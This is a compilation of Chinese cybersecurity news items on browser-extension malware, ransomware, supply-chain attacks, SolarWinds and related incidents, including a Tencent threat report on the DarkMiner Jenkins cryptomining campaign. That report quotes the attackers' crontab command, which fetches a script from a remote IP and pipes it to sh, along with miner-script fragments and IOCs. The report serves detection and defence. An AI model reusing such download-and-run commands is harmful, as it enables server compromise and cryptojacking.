去年 12 月，知名网络安全公司 Avast 在 Chrome 和 Edge 扩展商城上发现了 28 个含有恶意代码的扩展程序，有超过 300 万互联网用户受到影响。今天，Avast 进一步披露了该恶意代买 CacheFlow 的相关细节。所幸的是自 2020 年 12 月 18 日起，谷歌和微软均已将所有恶意扩展删除。 这些恶意扩展程序之所以能够躲避谷歌和微软严苛的安全审查，关键原因在于该恶意扩展会尝试使用分析请求的 Cache-Control HTTP 标头来隐藏其命令并控制秘密通道中的流量。Avast 认为这是一项新的技术。Avast 认为攻击者增加了 Google Analytics（分析）样式的流量不仅是为了隐藏恶意命令，而且扩展作者也对分析请求本身感兴趣。 Avast 认为攻击的步骤如下： 基于 Avast 的遥测数据，受影响最严重的三个国家和地区是巴西、乌克兰和法国。 这些恶意扩展程序伪装成工具，帮助用户下载 Facebook、Instagram 等社交媒体或 Vimeo、Spotify 等流媒体平台网站中的内容，但其中的恶意代码允许下载恶意程序来窃取用户敏感数据，重定向到广告和钓鱼网站。 Avast表示，这28个扩展包含可能执行一些恶意操作的代码，包括: ● 将用户流量重定向到广告 ● 将用户流量重定向到钓鱼网站 ● 收集个人数据，如出生日期、电子邮件地址和活动设备 ● 收集浏览历史 ● 擅自在用户设备上下载更多的恶意软件           （消息及封面来源：cnBeta）

一、概述 腾讯云防火墙捕获一黑客团伙利用Jenkins未授权访问漏洞针对云服务器的攻击，若攻击者利用漏洞攻击得手，就会通过CURL命令下载shell脚本执行，并继续通过脚本部署挖矿木马。腾讯云防火墙成功拦截了这些攻击，遭遇攻击的主机未受损失。 通过分析腾讯云防火墙拦截到的黑客攻击指令，发现攻击者在部署挖矿程序的过程中，会修改系统最大内存页，以达到系统资源的充分利用，并且会多次检测挖矿进程的状态，从而对挖矿程序进行保活操作。 因其该团伙使用的挖矿账名为syndarksonig@gmail.com，腾讯威胁情报中心将该挖矿木马命名为DarkMiner。根据该挖矿团伙使用的挖矿钱包算力估算，该团伙控制了约3000台服务器挖矿。 腾讯安全专家建议政企用户按照以下步骤自查是否遭遇类似攻击： 检查服务器是否部署Jenkins组件，如有部署，应继续检查是否配置复杂密码。配置弱密码的系统极易被入侵； 检查服务器是否访问矿池：142.44.242.100； 检查服务器是否存在恶意文件：/tmp/ .admin_thread，如有及时kill进程并删除相关文件。 腾讯安全响应清单 腾讯安全系列产品已针对DarkMiner黑产团伙进行升级响应，具体清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）DarkMiner团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）DarkMiner团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测和拦截Jenkins未授权命令执行漏洞利用攻击 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀DarkMiner团伙相关木马程序； 2）已支持检测Jenkins未授权命令执行漏洞； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测Jenkins未授权命令执行漏洞利用攻击； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 Jenkins是一个知名的独立开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，该项目提供了一个开放易用的软件平台，使软件的持续集成变成可能。如果用户在使用jenkins 时未设置帐号密码，或者使用了弱帐号密码，可能导致未授权访问攻击。 如果用户未设置密码，会导致系统存在Jakins存在未授权访问漏洞。 黑客在未授权的情况下访问jenkins系统，并通过系统管理中的“脚本命令行”功能执行了恶意脚本。 腾讯云防火墙捕获到黑客利用Jenkins未授权访问漏洞利用进行攻击的日志。 此次攻击执行恶意命令为： 'sh','-c','crontab -r; echo "* * * * * curl http[:]//37.49.230.155/manager.sh | sh; wget -O- http[:]//37.49.230.155/manager.sh | sh" | crontab -' 接着脚本manager.sh执行挖矿木马下载和启动。 首先根据CPU支持的线程数量设置最大内存页，以达到CPU资源利用最大化： SYSTEM_ADMIN_RENAME=".admin_thread"THREAD_COUNT=$(cat /proc/cpuinfo | grep model | grep name | wc -l) #sysctl -w vm.nr_hugepages=$THREAD_COUNT_MBbash -c "echo vm.nr_hugepages=$(($THREAD_COUNT * 1000)) >> /etc/sysctl.conf"#bash -c "echo vm.nr_hugepages=$THREAD_COUNT >> /etc/sysctl.conf" echo "Threads: $THREAD_COUNT, Threads in MB: $(($THREAD_COUNT * 1000))" sysctl -w vm.nr_hugepages=$(($THREAD_COUNT * 1000)) && echo "SET hugepage $(($THREAD_COUNT * 1000))" #|| \#sysctl -w vm.nr_hugepages=$THREAD_COUNT && echo "SET hugepage $THREAD_COUNT" for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d); do       echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages"; done echo "1GB pages successfully enabled" 然后通过cat /proc/cpuinfo命令获取CPU类型，并判断是否属于支持的类型。 进入TMP目录下，判断挖矿进程是否已经在运行中。 for path in $TMP_DIR do   >$path/.f && cd $path && rm .f done (ps -x | grep -e "$SYSTEM_ADMIN_RENAME" | grep -v grep) > /dev/null 2>&1 如果没有在运行中，则下载xmrig挖矿木马到/tmp/ .admin_thread，伪装成系统管理进程“System manager”，然后启动挖矿程序。 挖矿使用矿池：142.44.242.100:14444 钱包： 25WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB 根据该钱包的平均算力40KH/s推算，共有3000台左右服务器被攻陷并植入挖矿木马。 并且该木马会多次检测挖矿进程运行状态，发现失活就重复挖矿程序部署过程，使用多个旷工名连接矿池进行挖矿，其中挖矿子账号名均为syndarksonig@gmail.com。 DarkMiner团伙使用的旷工名 small big xm4868 jenkin jenkin xm14856 mac server xm18614 focal xm959 xm22649 macmac xm1600 xm29274 xmrig worker28467 xm13222 stak xm7381 xmrig29684   IOCs URL http[:]//37.49.230.155/bot.arm5 http[:]//37.49.230.155/system_manager.sh http[:]//37.49.230.155/ssh.sh http[:]//37.49.230.155/manager.sh http[:]//37.49.230.155/xmrig http[:]//37.49.230.155/xmrig1 http[:]//37.49.230.155/xmrig2 http[:]//37.49.230.155/xmrig3 http[:]//37.49.230.155/xmrig4 http[:]//37.49.230.155/xmrig5 MD5 manager.sh f8631ea3001a1ee82b6ba4b96cc6b26f 钱包： 425WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB

安全公司 ESET 近日放出了一则警告，提醒一款被挂有木马的 OpenSSH 软件，或被用于从 HPC 高性能计算集群中窃取 SSH 证书。这款 Linux 恶意软件被称作 Kobalos，安全研究人员称之“小而复杂”且“诡计多端”。即使攻击规模不大，但 Kobalos 后门还是渗透了一些主要目标，包括美国政府、欧洲大学、以及亚洲某些大型互联网服务提供商（ISP）的系统。 参考希腊神话中一个顽皮的小动物，ESET 研究人员将这款恶意软件命名为 Kobalos 。但除了 Linux、FreeBSD 和 Solaris，安全专家还发现了能够在 AIX、甚至 Windows 平台上运行的恶意软件变种的蛛丝马迹。 通过逆向工程可知，Kobalos 能够在互联网上扫描受害者。而且在大多数情况下，受害者主要集中在大型系统和超级计算机领域（另有涉及部分私有服务器设施），但目前尚未揪出相关事件的幕后黑手。 过去一年，互联网上曝光了多起涉及 HPC 集群的安全事件。比如 EGI CSIRT 调查发现有计算资源被利用于加密货币的挖矿，受害者包括波兰、加拿大等地的受感染服务器。 新闻中还提到过英国的 Archer 超级计算机（其 SSH 证书被盗），但目前尚不清楚黑客利用哪些恶意软件对其发起了怎样的攻击。 ESET 研究人员补充道，尽管 Kobalos 的代码库很是精简，但却包含了用于运行命令和远程服务器控制的代码。 为缓解攻击，安全公司建议用户为 SSH 服务器连接同时启用双因素身份验证。 最后，ESET 将其检测到的这款恶意软件正式命名为 Linux / Kobalos（或 Linux / Agent.IV）。 而用于 SSH 证书窃取的程序，则被称作 Linux / SSHDoor.EV、Linux / SSHDoor.FB、或 Linux / SSHDoor.FC 。           （消息来源：cnBeta；封面源自网络）

据外媒报道，虽然勒索软件仍是一个祸害，但现在也有一些好消息：受害者支付的平均金额在一年多的大幅增长后在Q4出现了下降。为什么呢？–因为越来越少的公司愿意屈服于赎金要求。来自网络安全公司Coveware公布的最新季度勒索软件报告显示，自2018年Q3以来，勒索软件的平均支付额持续上升，但在去年Q4下降34%，降至15.4108万美元。 与此同时，支付勒索软件费用的中位数也下降了55%，降至49,450美元。 一般来说，任何遭到勒索软件攻击的人都不被建议交出任何密码，因为这并不能保证作案者会交出加密密钥。似乎越来越多的公司开始听从这一建议。 该数据下滑的另一个原因则跟勒索软件攻击有关。犯罪分子威胁称，如果他们的要求得不到满足他们就会公布敏感信息。Coveware写道，这类攻击占Q4所有勒索软件攻击的70%，高于前一季度的50%。因为即使支付了赎金数据也会在网上泄露，所以很少有受害者会屈服于勒索。 在涉及数据被盗的案件中，只有60%的公司同意在Q4支付，低于第三季度的75%。 报告写道：“Coveware继续见证了被盗数据在付款后没有被删除或清除的迹象。此外，我们还看到一些组织在没有发生的情况下采取措施伪造数据外泄的样子。” 至于勒索软件的攻击载体，电子邮件钓鱼现在已经超过远程桌面协议(RDP)攻击成为最流行的网络攻击，其在Q4占比超过了50%。不过利用泄露的凭证的RDP仍非常流行，因为员工用户名和密码的勒索价低至50美元。 专业服务则是第二大最常见的勒索软件罪犯的目标行业–占比16.3%，仅次于医疗保健–占比17.9%。长期以来，医院和健康中心一直是犯罪分子认为他们更愿意掏钱的常见目标。随着疫情的蔓延，这些组织已经濒临崩溃的边缘，勒索软件的攻击则可能会造成生命的损失。             （消息及封面来源：cnBeta）

研究人员发现了一种软件供应链攻击，它被用来在在线游戏玩家的电脑上安装监控恶意软件。不明身份的攻击者针对的是NoxPlayer的特定用户，NoxPlayer是一个在PC和Mac上模拟Android操作系统的软件包。人们主要用它来玩这些平台上的移动Android游戏。NoxPlayer制造商BigNox表示，该软件在150个国家拥有1.5亿用户。 安全公司Eset周一表示，BigNox软件分发系统遭到黑客攻击，并被用来向部分用户提供恶意更新。最初的更新是在去年9月通过操纵两个文件交付的：主BigNox二进制文件Nox.exe和下载更新本身的NoxPack.exe。 Eset恶意软件研究员Ignacio Sanmillan表示：”我们有足够的证据说明BigNox基础设施(res06.bignox.com)被入侵以托管恶意软件，同时也表明他们的HTTP API基础设施(api.bignox.com)可能已经被入侵，在某些情况下，BigNox更新器从攻击者控制的服务器下载了额外的有效载荷。这表明，BigNox API回复中提供的URL字段被攻击者篡改了。” 简而言之，攻击是这样的：在启动时，Nox.exe会向一个编程接口发送请求，查询更新信息。BigNox API服务器会响应更新信息，其中包括合法更新的URL。Eset推测，合法的更新可能已经被恶意软件取代，或者，引入了新的文件名或URL。 然后，恶意软件被安装在目标机器上。恶意文件没有像合法更新那样进行数字签名。这说明BigNox软件构建系统并没有被入侵，只有提供更新的系统被入侵。恶意软件会对目标计算机进行有限的侦察。攻击者会进一步将恶意更新定制到特定的感兴趣的目标上。 BigNox API服务器向特定目标响应更新信息，这些信息指向攻击者控制的服务器上的恶意更新位置。观察到的入侵流程如下图所示。合法的BigNox基础设施正在为特定的更新提供恶意软件。我们观察到，这些恶意更新只在2020年9月进行。Sanmillan表示，在安装了NoxPlayer的10万多名Eset用户中，只有5人收到了恶意更新。这些数字凸显了攻击的针对性。目标位于台湾、香港和斯里兰卡。         （消息及封面来源：cnBeta）

虽然近年来受欢迎程度逐渐下滑，但不少系统依然依赖 Perl 编程语言。上周末 Perl 基础架构博客 Perl NOC 报道称，Perl.com 官网被劫持，不再指向它原本应该指向的地方。它不再指向 Perl 相关的新闻网站，而被指向了一个停车网站。更严重的是，它被用于分发恶意软件。 需要说明的是，Perl编程语言的官方网站perl.org仍然安全完整。不幸的是，Perl.com 也被用作通过 CPAN 分发模块的镜像或备份。换句话说，劫持者有可能利用这种联系来危害使用 Perl 和 CPAN 的系统。目前官方已经在进行收回域名的工作，不过目前还没有估计何时能恢复正常。同时，我们强烈建议不要访问perl.com，并从CPAN设置中删除它。       （消息及封面来源：cnBeta）

调查疑似俄罗斯黑客入侵美国财政部的当局报告称，该行动远远超出了SolarWinds的范围。据报道，2020年底，国家电信和信息管理局（NTIA）的黑客行为涉及利用许多系统的漏洞。并不像之前怀疑的那样，仅限于SolarWinds网络软件。 据《华尔街日报》报道，在所有黑客攻击的受害者中，有近三分之一的人并没有使用SolarWinds，也与该产品没有任何关系。国土安全部网络安全和基础设施安全局代理局长布兰登·威尔士表示，黑客使用的途径远比最初认为的要多。 “[攻击者]通过各种方式获得了对目标的访问权限，”威尔士在接受采访时告诉《华尔街日报》。”这个对手很有创意，需要弄清楚的是，这场运动不应该被认为是SolarWinds运动。” SolarWinds在全球拥有超过30万客户，其网络软件被美国财富500强客户中的412家使用。据报道，黑客利用SolarWinds技术管理软件规避了微软Office 365的安全认证。 “这肯定是我们追踪到的最复杂的黑客行为者之一，就他们的方法、纪律和他们所拥有的技术范围而言，”微软威胁情报中心经理John Lambert表示。 网络安全和基础设施安全局没有点名涉及的其他系统。但调查人员表示，此次事件表明复杂的黑客行为可以利用认证漏洞在不同的云账户之间移动。据报道，SolarWinds本身的调查人员正在研究微软云是否是攻击的最初起点。 “我们将继续与联邦执法部门和情报机构密切合作，调查这次前所未有的攻击的全部范围。”SolarWinds发言人说。           （消息及封面来源：cnBeta）

据外媒报道，美国和保加利亚当局本周查封了网络勒索软件犯罪组织NetWalker用来发布从受害者那里窃取的数据的暗网网站。而跟此次查封有关的是一名来自加拿大的公民，其被指涉嫌通过传播NetWalker勒索2700多万美元，目前在佛罗里达州法院受到指控。 etWalker是一个以勒索软件为服务的犯罪软件产品，其附属机构租用不断更新的恶意软件代码以换取从受害者那里勒索的资金的一部分。NetWalker背后的犯罪分子利用现已被占领的网站公布从他们的猎物那里窃取的个人和私有数据，然后以此作为公众压力运动的一部分说服受害者付钱。 NetWalker是最贪婪的勒索软件之一，根据追踪虚拟货币支付的Chainalysis公司的获取数据，它攻击了来自27个国家的至少305名受害者，其中大多数在美国。 这家公司在一篇博文介绍称，自NetWalker勒索软件于2018年8月首次出现以来他们追踪到4600多万美元的赎金，并且到2020年年中，赎金激增–平均赎金从2019年的1.88万美元增加到了去年的6.5万美元。 美司法部在一份声明中表示，NetWalker勒索软件已经影响了众多受害者，包括公司、市政当局、医院、执法部门、紧急服务部门、学区、学院和大学。像加州大学旧金山分校去年夏天就支付了114万美元以换取一把能够解锁被勒索软件加密的文件的数字密匙。司法部称：“在COVID-19大流行期间，攻击专门针对医疗保健部门以利用这场全球危机来敲诈受害者。” 美国检察官指出，NetWalker的主要成员之一是加拿大渥太华加蒂诺的Sebastien Vachon-Desjardins。从佛罗里达州公布的一份起诉书了解到，Vachon-Desjardins从中获取了至少2760万美元的金钱。 虽然美司法部媒体顾问没有提及被告的年龄，但2015年加蒂诺当地新闻网站ledroit.com的一份报告表明，这可能不是他第一次犯罪。据报道，Vachon-Desjardins在27岁的时候曾因贩毒被判过三年多的监禁：据报道，他被发现持有5万多片的冰毒药片。 据了解，NetWalker勒索软件联盟项目于2020年3月启动，当时犯罪软件项目的管理员开始在暗网上招募人员。像许多其他勒索软件程序一样，NetWalker不允许分支机构感染位于俄罗斯或任何其他独联体（包括大多数前苏联国家）成员国的系统。这一禁令则是由俄罗斯和/或其他CIS国家协调的网络犯罪行动制定的。         （消息及封面来源：cnBeta）

据外媒报道，当地时间周二，白宫方面表示，即将卸任的特朗普总统签署了一项行政命令，旨在阻止外国利用云计算产品对美国进行恶意网络行动。这是特朗普总统就职的最后一天。 最先由路透社报道的这项命令赋予美国商务部以制定规则来在外国人利用云计算产品或服务进行网络攻击的情况下禁止美国跟他们在该领域进行交易权力的权力。 这项命令还要求该机构在六个月内为Infrastructure as a Service–一种云计算类型–美国供应商制定规则，从而确认他们与之进行业务往来的外国人的身份并并保留特定记录。 一位高级官员披露，美国官员已经为这项指令运作了近两年时间。但它的推出却是在美国科技公司SolarWinds以侵入联邦政府网络为跳板的大规模黑客活动之后。美国高级官员和国会议员指责俄罗斯发动了大规模的黑客攻击，但克里姆林宫否认了这一指控。 民主党当选总统乔·拜登将于周三将宣誓就职，而他可以轻松撤销特朗普总统任期即将结束时发布的行政命令。对此，拜登的过渡团队方面没有立即回应置评请求。           （消息及封面来源：cnBeta）

欧洲药品管理局周五表示，黑客不仅从该机构的服务器上窃取了 COVID-19 疫苗文件，还对泄漏到网络上的文档进行了“篡改”。据悉，作为疫苗审批程度的一部分，该机构不仅负责着欧盟 27 个成员国的药品监管工作，还拥有大量与 COVID-19 有关的机密数据。 然而一项正在进行中的调查显示，黑客从 11 月开始就收到了与实验性冠状病毒疫苗评估相关的电子邮件和文件。总部位于荷兰的欧洲药品管理局写道： 某些函件已在黑客向外界公布前被篡改，从而破坏了人们对于疫苗的信任。我们已经注意到，某些通信并非以完整 / 原始的形式发布，而是被黑客篡改或添油加醋。 虽然 EMA 没有明确提及哪些信息，但网络安全专家指出，这种做法具有假冒政府发起虚假宣传活动的典型特征。 意大利网络安全公司 Yarix 表示，早在 2020 年 12 月 30 日，他们就已经在某个‘众所周知’的地下论坛看到了所谓的爆料。 发布者还拟了个相当耸人听闻的标题 ——《令人惊讶的欺诈！邪恶的片子！假疫苗！》—— 然后此事开始在暗网和其它网站上流传。 网络犯罪分子的意图很是明确，即通过刻意编造的泄露事件，对欧洲药品管理局和辉瑞等疫苗研发企业的声誉造成重大损害。 此外网络安全顾问 Lukasz Olejnik 表示，黑客背后或许还有更多不可告人的秘密： 我担心此类‘爆料’会引发整个欧洲的人们对 EMA 药物审查和疫苗接种流程的极大不信任，虽然尚不清楚谁是幕后主使，但明显有人决定为此事投入大量资源。 这种针对药物审核材料的抹黑攻击操作可谓是前所未见，如果被幕后黑手得逞，最终可能导致对欧洲人的健康产生广泛而负面的影响。 去年 12 月，总部位于阿姆斯特丹的 EMA 还曾遭到德国等欧盟成员国的严厉批评，埋怨其未能更快的批准新冠疫苗的上市。 至于针对最新的黑客攻击事件的调查进展，EMA 表示执法部门正在针对本次黑客攻击事件采取必要的行动。         （消息及封面来源：cnBeta）